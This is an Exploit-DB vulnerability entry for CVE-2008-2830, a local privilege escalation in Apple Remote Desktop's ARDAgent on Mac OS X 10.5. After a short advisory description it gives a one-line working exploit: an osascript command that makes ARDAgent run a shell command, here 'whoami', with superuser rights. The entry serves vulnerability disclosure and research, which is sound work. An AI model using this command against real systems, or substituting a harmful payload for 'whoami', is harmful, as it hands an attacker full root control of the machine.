Apple Mac OS X 10.x - AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability

2008-06-19T00:00:00
ID EDB-ID:31940
Type exploitdb
Reporter anonymous
Modified 2008-06-19T00:00:00

Description

Apple Mac OS X 10.x AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability. CVE-2008-2830 . Local exploit for osx platform

                                        
                                            source: http://www.securityfocus.com/bid/29831/info

Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).

Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.

This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable. 

osascript -e 'tell app "ARDAgent" to do shell script "whoami"';